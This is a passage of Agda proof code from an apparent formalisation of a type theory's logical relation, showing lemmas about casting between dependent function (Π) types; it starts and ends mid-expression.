¹ ]) → (Δ ⊢ e′ ∷ Id (Univ rF ⁰) (wk ρ F) (wk ρ F₁) ^ [ % , ι ¹ ]) → (Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x ≡ cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e′) y ∷ wk ρ F ^ [ rF , ι ⁰ ] / [F] [ρ] ⊢Δ) where b = λ ρ e x → cast ⁰ (wk ρ F₁) (wk ρ F) (Idsym (Univ rF ⁰) (wk ρ F) (wk ρ F₁) e) x ⊢IdFF₁ : Γ ⊢ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ⊢IdFF₁ = univ (Idⱼ (univ 0<1 ⊢Γ) (un-univ ⊢F) (un-univ ⊢F₁)) Δ₀ = Γ ∙ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ∙ wk1 F₁ ^ [ rF , ι ⁰ ] ρ₀ = (step (step id)) ⊢IdG₁G : Γ ∙ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ⊢ Π (wk1 F₁) ^ rF ° ⁰ ▹ Id (U ⁰) ((wk1d G) [ b ρ₀ (var 1) (var 0) ]↑) (wk1d G₁) ° ¹ ° ¹ ^ [ % , ι ¹ ] ⊢IdG₁G = let ⊢Δ₀ : ⊢ Δ₀ ⊢Δ₀ = ⊢Γ ∙ ⊢IdFF₁ ∙ univ (Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢IdFF₁) (un-univ ⊢F₁)) [ρ₀] : ρ₀ Twk.∷ Δ₀ ⊆ Γ [ρ₀] = Twk.step (Twk.step Twk.id) [0] : Δ₀ ⊩⟨ ι ⁰ ⟩ var 0 ∷ wk ρ₀ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ₀] ⊢Δ₀ [0] = let x = (var ⊢Δ₀ (PE.subst (λ X → 0 ∷ X ^ [ rF , ι ⁰ ] ∈ Δ₀) (wk1-wk (step id) F₁) here)) in neuTerm ([F₁] [ρ₀] ⊢Δ₀) (var 0) x (~-var x) ⊢1 : Δ₀ ⊢ (var 1) ∷ Id (Univ rF ⁰) (wk ρ₀ F) (wk ρ₀ F₁) ^ [ % , ι ¹ ] ⊢1 = var ⊢Δ₀ (PE.subst₂ (λ X Y → 1 ∷ Id (Univ rF ⁰) X Y ^ [ % , ι ¹ ] ∈ Δ₀) (wk1-wk (step id) F) (wk1-wk (step id) F₁) (there here)) ⊢G₀ : Δ₀ ⊢ wk (lift ρ₀) G [ b ρ₀ (var 1) (var 0) ] ^ [ ! , ι ⁰ ] ⊢G₀ = escape ([G] [ρ₀] ⊢Δ₀ ([b] [ρ₀] ⊢Δ₀ ⊢1 [0])) ⊢G₀′ = PE.subst (λ X → Δ₀ ⊢ X ^ [ ! , ι ⁰ ]) (PE.sym (cast-subst-lemma2 G (b ρ₀ (var 1) (var 0)))) ⊢G₀ x₀ : Δ₀ ⊢ Id (U ⁰) ((wk1d G) [ b ρ₀ (var 1) (var 0) ]↑) (wk1d G₁) ∷ SProp ¹ ^ [ ! , ∞ ] x₀ = Idⱼ (univ 0<1 ⊢Δ₀) (un-univ ⊢G₀′) (un-univ (Twk.wk (Twk.lift (Twk.step Twk.id)) ⊢Δ₀ ⊢G₁)) x₁ = Πⱼ <is≤ 0<1 ▹ ≡is≤ PE.refl ▹ Twk.wkTerm (Twk.step Twk.id) (⊢Γ ∙ ⊢IdFF₁) (un-univ ⊢F₁) ▹ x₀ in univ x₁ ⊢e′ : Γ ⊢ e ∷ ∃ (Id (Univ rF ⁰) F F₁) ▹ (Π (wk1 F₁) ^ rF ° ⁰ ▹ Id (U ⁰) ((wk1d G) [ b ρ₀ (var 1) (var 0) ]↑) (wk1d G₁) ° ¹ ° ¹) ^ [ % , ι ¹ ] ⊢e′ = let b₀ = cast ⁰ (wk1 (wk1 F₁)) (wk1 (wk1 F)) (Idsym (Univ rF ⁰) (wk1 (wk1 F)) (wk1 (wk1 F₁)) (var 1)) (var 0) b≡b₀ : b ρ₀ (var 1) (var 0) PE.≡ b₀ b≡b₀ = PE.cong₂ (λ X Y → cast ⁰ Y X (Idsym (Univ rF ⁰) X Y (var 1)) (var 0)) (PE.sym (wk1-wk (step id) F)) (PE.sym (wk1-wk (step id) F₁)) x₀ = conv ⊢e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (un-univ≡ (subset* D)) (un-univ≡ (subset* D₁)))) x₁ = conv x₀ (univ (Id-U-ΠΠ (un-univ ⊢F) (un-univ ⊢G) (un-univ ⊢F₁) (un-univ ⊢G₁))) x₂ = PE.subst (λ X → Γ ⊢ e ∷ ∃ (Id (Univ rF ⁰) F F₁) ▹ (Π (wk1 F₁) ^ rF ° ⁰ ▹ Id (U ⁰) ((wk1d G) [ X ]↑) (wk1d G₁) ° ¹ ° ¹) ^ [ % , ι ¹ ]) (PE.sym b≡b₀) x₁ in x₂ ⊢fste : Γ ⊢ fst e ∷ Id (Univ rF ⁰) F F₁ ^ [ % , ι ¹ ] ⊢fste = fstⱼ (un-univ ⊢IdFF₁) (un-univ ⊢IdG₁G) ⊢e′ ⊢snde : Γ ⊢ snd e ∷ Π F₁ ^ rF ° ⁰ ▹ Id (U ⁰) (wk1d G [ b (step id) (fst (wk1 e)) (var 0) ]) G₁ ° ¹ ° ¹ ^ [ % , ι ¹ ] ⊢snde = let x₀ = sndⱼ (un-univ ⊢IdFF₁) (un-univ ⊢IdG₁G) ⊢e′ x₁ = PE.subst₂ (λ X Y → Γ ⊢ snd e ∷ (Π X ^ rF ° ⁰ ▹ subst _ (Id (U ⁰) Y (wk1d G₁)) ° ¹ ° ¹) ^ [ % , ι ¹ ]) (wk1-singleSubst F₁ (fst e)) (cast-subst-lemma2 G (b ρ₀ (var 1) (var 0))) x₀ x₂ = PE.subst₂ (λ X Y → Γ ⊢ snd e ∷ Π F₁ ^ rF ° ⁰ ▹ Id (U ⁰) X Y ° ¹ ° ¹ ^ [ % , ι ¹ ]) (singleSubstLift (wk (lift ρ₀) G) (b ρ₀ (var 1) (var 0))) (wk1d-singleSubst G₁ (fst e)) x₁ σ = liftSubst (sgSubst (fst e)) b≡b : subst σ (b ρ₀ (var 1) (var 0)) PE.≡ b (step id) (fst (wk1 e)) (var 0) b≡b = PE.trans (PE.cong (λ X → cast ⁰ (subst σ (wk ρ₀ F₁)) (subst σ (wk ρ₀ F)) X (var 0)) (subst-Idsym σ (Univ rF ⁰) (wk ρ₀ F) (wk ρ₀ F₁) (var 1))) (PE.cong₂ (λ X Y → cast ⁰ Y X (Idsym (Univ rF ⁰) X Y (fst (wk1 e))) (var 0)) (cast-subst-lemma5 F (fst e)) (cast-subst-lemma5 F₁ (fst e))) x₃ = PE.subst₂ (λ X Y → Γ ⊢ snd e ∷ Π F₁ ^ rF ° ⁰ ▹ Id (U ⁰) (X [ Y ]) G₁ ° ¹ ° ¹ ^ [ % , ι ¹ ]) (cast-subst-lemma3 G (fst e)) b≡b x₂ in x₃ ⊢snde′ : ∀ {ρ Δ x} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → (⊢x : Δ ⊢ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ]) → Δ ⊢ snd (wk ρ e) ∘ x ^ ¹ ∷ Id (U ⁰) (wk (lift ρ) G [ b ρ (fst (wk ρ e)) x ]) (wk (lift ρ) G₁ [ x ]) ^ [ % , ι ¹ ] ⊢snde′ {ρ} {Δ} {x} [ρ] ⊢Δ ⊢x = let -- I should probably make some generic lemma about pushing weakening and subst in b y₀ = PE.trans (PE.cong (λ X → X [ x ]) (wk-Idsym (lift ρ) (Univ rF ⁰) (wk1 F) (wk1 F₁) (fst (wk1 e)))) (PE.trans (subst-Idsym (sgSubst x) (Univ rF ⁰) (wk (lift ρ) (wk1 F)) (wk (lift ρ) (wk1 F₁)) (fst (wk (lift ρ) (wk1 e)))) (PE.cong₃ (λ X Y Z → Idsym (Univ rF ⁰) X Y (fst Z)) (irrelevant-subst′ ρ F x) (irrelevant-subst′ ρ F₁ x) (irrelevant-subst′ ρ e x))) y₁ : wk (lift ρ) (b (step id) (fst (wk1 e)) (var 0)) [ x ] PE.≡ b ρ (fst (wk ρ e)) x y₁ = PE.cong₃ (λ X Y Z → cast ⁰ X Y Z x) (irrelevant-subst′ ρ F₁ x) (irrelevant-subst′ ρ F x) y₀ x₀ : Δ ⊢ (wk ρ (snd e)) ∘ x ^ ¹ ∷ Id (U ⁰) (wk (lift ρ) (wk1d G [ b (step id) (fst (wk1 e)) (var 0) ]) [ x ]) (wk (lift ρ) G₁ [ x ]) ^ [ % , ι ¹ ] x₀ = Twk.wkTerm [ρ] ⊢Δ ⊢snde ∘ⱼ ⊢x x₁ = PE.cong₂ (λ X Y → X [ Y ]) (cast-subst-lemma4 ρ x G) y₁ x₂ = PE.trans (singleSubstLift (wk (lift (lift ρ)) (wk1d G)) (wk (lift ρ) (b (step id) (fst (wk1 e)) (var 0)))) x₁ x₃ = PE.trans (PE.cong (λ X → X [ x ]) (wk-β {a = b (step id) (fst (wk1 e)) (var 0)} (wk1d G))) x₂ x₄ = PE.subst (λ X → Δ ⊢ snd (wk ρ e) ∘ x ^ ¹ ∷ Id (U ⁰) X (wk (lift ρ) G₁ [ x ]) ^ [ % , ι ¹ ]) x₃ x₀ in x₄ g = λ ρ x → cast ⁰ (wk (lift ρ) G [ b ρ (fst (wk ρ e)) x ]) (wk (lift ρ) G₁ [ x ]) ((snd (wk ρ e)) ∘ x ^ ¹) ((wk ρ t) ∘ (b ρ (fst (wk ρ e)) x) ^ ⁰) [g] : ∀ {ρ Δ x} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ g ρ x ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x] [g] {ρ} {Δ} {x} [ρ] ⊢Δ [x] = let [b]′ = [b] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [x] [t] = proj₁ (redSubst*Term (appRed* (escapeTerm ([F] [ρ] ⊢Δ) [b]′) (Twk.wkRed*Term [ρ] ⊢Δ Df)) ([G] [ρ] ⊢Δ [b]′) ([f] [ρ] ⊢Δ [b]′)) in recursor [ρ] ⊢Δ [b]′ [x] [t] (⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₁] [ρ] ⊢Δ) [x])) [gext] : ∀ {ρ Δ x y} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([x] : Δ ⊩⟨ ι ⁰ ⟩ x ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([y] : Δ ⊩⟨ ι ⁰ ⟩ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → ([x≡y] : Δ ⊩⟨ ι ⁰ ⟩ x ≡ y ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊩⟨ ι ⁰ ⟩ g ρ x ≡ g ρ y ∷ wk (lift ρ) G₁ [ x ] ^ [ ! , ι ⁰ ] / [G₁] [ρ] ⊢Δ [x] [gext] {ρ} {Δ} {x} {y} [ρ] ⊢Δ [x] [y] [x≡y] = let [b₁] = [b] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [x] [b₂] = [b] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [y] [b₁≡b₂] = [bext] [ρ] ⊢Δ (Twk.wkTerm [ρ] ⊢Δ ⊢fste) (Twk.wkTerm [ρ] ⊢Δ ⊢fste) [x] [y] [x≡y] D₁ = (appRed* (escapeTerm ([F] [ρ] ⊢Δ) [b₁]) (Twk.wkRed*Term [ρ] ⊢Δ Df)) D₂ = (appRed* (escapeTerm ([F] [ρ] ⊢Δ) [b₂]) (Twk.wkRed*Term [ρ] ⊢Δ Df)) [t₁] = proj₁ (redSubst*Term D₁ ([G] [ρ] ⊢Δ [b₁]) ([f] [ρ] ⊢Δ [b₁])) [t₂] = proj₁ (redSubst*Term D₂ ([G] [ρ] ⊢Δ [b₂]) ([f] [ρ] ⊢Δ [b₂])) [t₁≡t₂] = redSubst*EqTerm D₁ D₂ ([G] [ρ] ⊢Δ [b₁]) ([G] [ρ] ⊢Δ [b₂]) (G-ext [ρ] ⊢Δ [b₁] [b₂] [b₁≡b₂]) ([f] [ρ] ⊢Δ [b₁]) ([f] [ρ] ⊢Δ [b₂]) ([fext] [ρ] ⊢Δ [b₁] [b₂] [b₁≡b₂]) in extrecursor [ρ] ⊢Δ [b₁] [b₂] [b₁≡b₂] [x] [y] [x≡y] [t₁] [t₂] [t₁≡t₂] (⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₁] [ρ] ⊢Δ) [x])) (⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₁] [ρ] ⊢Δ) [y])) Δ₁ = Γ ∙ F₁ ^ [ rF , ι ⁰ ] ⊢Δ₁ : ⊢ Δ₁ ⊢Δ₁ = ⊢Γ ∙ ⊢F₁ ρ₁ = (step id) [ρ₁] : ρ₁ Twk.∷ Δ₁ ⊆ Γ [ρ₁] = Twk.step Twk.id [0] : Δ₁ ⊩⟨ ι ⁰ ⟩ var 0 ∷ wk ρ₁ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ₁] ⊢Δ₁ [0] = neuTerm ([F₁] [ρ₁] ⊢Δ₁) (var 0) (var ⊢Δ₁ here) (~-var (var ⊢Δ₁ here)) ⊢g0 = PE.subst (λ X → Δ₁ ⊢ g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₁) (escapeTerm ([G₁] [ρ₁] ⊢Δ₁ [0]) ([g] [ρ₁] ⊢Δ₁ [0])) ⊢λg : Γ ⊢ lam F₁ ▹ g (step id) (var 0) ^ ⁰ ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ] ⊢λg = lamⱼ (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁ ⊢g0 Dg : Γ ⊢ cast ⁰ A B e t :⇒*: (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ ι ⁰ Dg = let g0 = lam F₁ ▹ cast ⁰ (G [ b (step id) (fst (wk1 e)) (var 0) ]↑) G₁ ((snd (wk1 e)) ∘ (var 0) ^ ¹) ((wk1 t) ∘ (b (step id) (fst (wk1 e)) (var 0)) ^ ⁰) ^ ⁰ g≡g : g0 PE.≡ lam F₁ ▹ g (step id) (var 0) ^ ⁰ g≡g = PE.cong₂ (λ X Y → lam F₁ ▹ cast ⁰ X Y ((snd (wk1 e)) ∘ (var 0) ^ ¹) ((wk1 t) ∘ (b (step id) (fst (wk1 e)) (var 0)) ^ ⁰) ^ ⁰) (wk1d[]-[]↑ G (b (step id) (fst (wk1 e)) (var 0))) (PE.sym (wkSingleSubstId G₁)) ⊢e′ = conv ⊢e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (un-univ≡ (subset* D)) (refl (un-univ ⊢B)))) ⊢e″ = conv ⊢e (univ (Id-cong (refl (univ 0<1 ⊢Γ)) (un-univ≡ (subset* D)) (un-univ≡ (subset* D₁)))) in [[ conv (castⱼ (un-univ ⊢A) (un-univ ⊢B) ⊢e (conv ⊢t (sym (subset* D)))) (subset* D₁) , ⊢λg , (conv* (CastRed*Term′ ⊢B ⊢e (conv ⊢t (sym (subset* D))) D ⇨∷* castΠRed* ⊢F ⊢G ⊢e′ ⊢t D₁) (subset* D₁)) ⇨∷* (PE.subst (λ X → Γ ⊢ cast ⁰ (Π F ^ rF ° ⁰ ▹ G ° ⁰ ° ⁰) (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) e t ⇒ X ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ ι ⁰) g≡g (cast-Π (un-univ ⊢F) (un-univ ⊢G) (un-univ ⊢F₁) (un-univ ⊢G₁) ⊢e″ ⊢t) ⇨ (id ⊢λg)) ]] g≡g : Γ ⊢ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ≅ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∷ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ] g≡g = let ⊢F₁′ = Twk.wk (Twk.step Twk.id) ⊢Δ₁ ⊢F₁ ⊢g0 = escapeTerm ([G₁] [ρ₁] ⊢Δ₁ [0]) ([g] [ρ₁] ⊢Δ₁ [0]) ⊢g0′ = (PE.subst (λ X → Δ₁ ⊢ g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₁) ⊢g0) ⊢g0″ = Twk.wkTerm (Twk.lift (Twk.step Twk.id)) (⊢Δ₁ ∙ ⊢F₁′) ⊢g0′ D : Δ₁ ⊢ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒* g (step id) (var 0) ∷ wk1d G₁ [ var 0 ] ^ ι ⁰ D = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ X ∷ wk1d G₁ [ var 0 ] ^ ι ⁰) (wkSingleSubstId (g (step id) (var 0))) (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁′ ⊢g0″ (var ⊢Δ₁ here)) ⇨ id ⊢g0 [g0] : Δ₁ ⊩⟨ ι ⁰ ⟩ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ∷ wk1d G₁ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₁] [ρ₁] ⊢Δ₁ [0] [g0] = proj₁ (redSubst*Term D ([G₁] [ρ₁] ⊢Δ₁ [0]) ([g] [ρ₁] ⊢Δ₁ [0])) x₀ = escapeEqReflTerm ([G₁] [ρ₁] ⊢Δ₁ [0]) [g0] x₁ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≅ (lam (wk1 F₁) ▹ wk1d (g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₁) x₀ in ≅-η-eq (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁ ⊢λg ⊢λg lamₙ lamₙ x₁ g∘a≡ga : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) → (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / [F₁] [ρ] ⊢Δ) → Δ ⊢ wk ρ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ⇒* g ρ a ∷ wk (lift ρ) G₁ [ a ] ^ ι ⁰ g∘a≡ga {ρ} {Δ} {a} [ρ] ⊢Δ [a] = let ⊢F₁′ = (Twk.wk [ρ] ⊢Δ ⊢F₁) -- this lemma is already in ⊢snde′. maybe refactor? x₀ : wk (lift ρ) (b (step id) (fst (wk1 e)) (var 0)) [ a ] PE.≡ b ρ (fst (wk ρ e)) a x₀ = PE.trans (PE.cong (λ X → cast ⁰ (wk (lift ρ) (wk1 F₁) [ a ]) (wk (lift ρ) (wk1 F) [ a ]) X a) (PE.trans (PE.cong (λ X → X [ a ]) (wk-Idsym (lift ρ) (Univ rF ⁰) (wk1 F) (wk1 F₁) (fst (wk1 e)))) (subst-Idsym (sgSubst a) (Univ rF ⁰) (wk (lift ρ) (wk1 F)) (wk (lift ρ) (wk1 F₁)) (fst (wk (lift ρ) (wk1 e)))))) (PE.cong₃ (λ X Y Z → cast ⁰ Y X (Idsym (Univ rF ⁰) X Y (fst Z)) a) (irrelevant-subst′ ρ F a) (irrelevant-subst′ ρ F₁ a) (irrelevant-subst′ ρ e a)) x₁ : wk (lift ρ) (g (step id) (var 0)) [ a ] PE.≡ g ρ a x₁ = PE.cong₄ (λ X Y Z T → cast ⁰ X Y Z T) (PE.trans (cast-subst-lemma6 ρ G _ a) (PE.cong (λ X → wk (lift ρ) G [ X ]) x₀)) (PE.cong (λ X → wk (lift ρ) X [ a ]) (wkSingleSubstId G₁)) (PE.cong (λ X → snd X ∘ a ^ ¹) (irrelevant-subst′ ρ e a)) (PE.cong₂ (λ X Y → X ∘ Y ^ ⁰) (irrelevant-subst′ ρ t a) x₀) x₂ : Δ ∙ (wk ρ F₁) ^ [ rF , ι ⁰ ] ⊢ wk (lift ρ) (g (step id) (var 0)) ∷ wk (lift ρ) G₁ ^ [ ! , ι ⁰ ] x₂ = Twk.wkTerm (Twk.lift [ρ]) (⊢Δ ∙ ⊢F₁′) ⊢g0 in PE.subst (λ X → Δ ⊢ wk ρ (lam F₁ ▹ g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ⇒ X ∷ wk (lift ρ) G₁ [ a ] ^ ι ⁰) x₁ (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₁′ x₂ (escapeTerm ([F₁] [ρ] ⊢Δ) [a])) ⇨ id (escapeTerm ([G₁] [ρ] ⊢Δ [a]) ([g] [ρ] ⊢Δ [a])) [castΠΠ] : Γ ⊩⟨ ι ⁰ ⟩ cast ⁰ A B e t ∷ B ^ [ ! , ι ⁰ ] / (Πᵣ′ rF ⁰ ⁰ (≡is≤ PE.refl) (≡is≤ PE.refl) F₁ G₁ [[ ⊢B , ⊢ΠF₁G₁ , D₁ ]] ⊢F₁ ⊢G₁ A₁≡A₁ [F₁] [G₁] G₁-ext) [castΠΠ] = ((lam F₁ ▹ g (step id) (var 0) ^ ⁰) , Dg , lamₙ , g≡g , (λ [ρ] ⊢Δ [a] [a′] [a≡a′] → redSubst*EqTerm (g∘a≡ga [ρ] ⊢Δ [a]) (g∘a≡ga [ρ] ⊢Δ [a′]) ([G₁] [ρ] ⊢Δ [a]) ([G₁] [ρ] ⊢Δ [a′]) (G₁-ext [ρ] ⊢Δ [a] [a′] [a≡a′]) ([g] [ρ] ⊢Δ [a]) ([g] [ρ] ⊢Δ [a′]) ([gext] [ρ] ⊢Δ [a] [a′] [a≡a′])) , (λ [ρ] ⊢Δ [a] → proj₁ (redSubst*Term (g∘a≡ga [ρ] ⊢Δ [a]) ([G₁] [ρ] ⊢Δ [a]) ([g] [ρ] ⊢Δ [a])))) module cast-ΠΠ-lemmas-3 {Γ A₁ A₂ A₃ A₄ F₁ F₂ F₃ F₄ rF G₁ G₂ G₃ G₄ e₁₃ e₂₄ t₁ f₁ t₂ f₂} (⊢Γ : ⊢ Γ) (⊢A₁ : Γ ⊢ A₁ ^ [ ! , ι ⁰ ]) (⊢ΠF₁G₁ : Γ ⊢ Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₁ : Γ ⊢ A₁ ⇒* Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₁ : Γ ⊢ F₁ ^ [ rF , ι ⁰ ]) (⊢G₁ : (Γ ∙ F₁ ^ [ rF , ι ⁰ ]) ⊢ G₁ ^ [ ! , ι ⁰ ]) (A₁≡A₁ : Γ ⊢ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ≅ (Π F₁ ^ rF ° ⁰ ▹ G₁ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₁] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₁ ^ [ rF , ι ⁰ ]) ([G₁] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ^ [ ! , ι ⁰ ])) (G₁-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₁ ^ [ rF , ι ⁰ ] / ([F₁] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₁ [ a ] ≡ wk (lift ρ) G₁ [ b ] ^ [ ! , ι ⁰ ] / ([G₁] [ρ] ⊢Δ [a]))) (⊢A₂ : Γ ⊢ A₂ ^ [ ! , ι ⁰ ]) (⊢ΠF₂G₂ : Γ ⊢ Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₂ : Γ ⊢ A₂ ⇒* Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₂ : Γ ⊢ F₂ ^ [ rF , ι ⁰ ]) (⊢G₂ : (Γ ∙ F₂ ^ [ rF , ι ⁰ ]) ⊢ G₂ ^ [ ! , ι ⁰ ]) (A₂≡A₂ : Γ ⊢ (Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰) ≅ (Π F₂ ^ rF ° ⁰ ▹ G₂ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₂] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₂ ^ [ rF , ι ⁰ ]) ([G₂] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₂ [ a ] ^ [ ! , ι ⁰ ])) (G₂-ext : ∀ {ρ} {Δ} {a} {b} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) ([b] : Δ ⊩⟨ ι ⁰ ⟩ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) ([a≡b] : Δ ⊩⟨ ι ⁰ ⟩ a ≡ b ∷ wk ρ F₂ ^ [ rF , ι ⁰ ] / ([F₂] [ρ] ⊢Δ)) → (Δ ⊩⟨ ι ⁰ ⟩ wk (lift ρ) G₂ [ a ] ≡ wk (lift ρ) G₂ [ b ] ^ [ ! , ι ⁰ ] / ([G₂] [ρ] ⊢Δ [a]))) (⊢A₃ : Γ ⊢ A₃ ^ [ ! , ι ⁰ ]) (⊢ΠF₃G₃ : Γ ⊢ Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (D₃ : Γ ⊢ A₃ ⇒* Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ]) (⊢F₃ : Γ ⊢ F₃ ^ [ rF , ι ⁰ ]) (⊢G₃ : (Γ ∙ F₃ ^ [ rF , ι ⁰ ]) ⊢ G₃ ^ [ ! , ι ⁰ ]) (A₃≡A₃ : Γ ⊢ (Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰) ≅ (Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰) ^ [ ! , ι ⁰ ]) ([F₃] : ∀ {ρ} {Δ} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → Δ ⊩⟨ ι ⁰ ⟩ wk ρ F₃ ^ [ rF , ι ⁰ ]) ([G₃] : ∀ {ρ} {Δ} {a} ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) 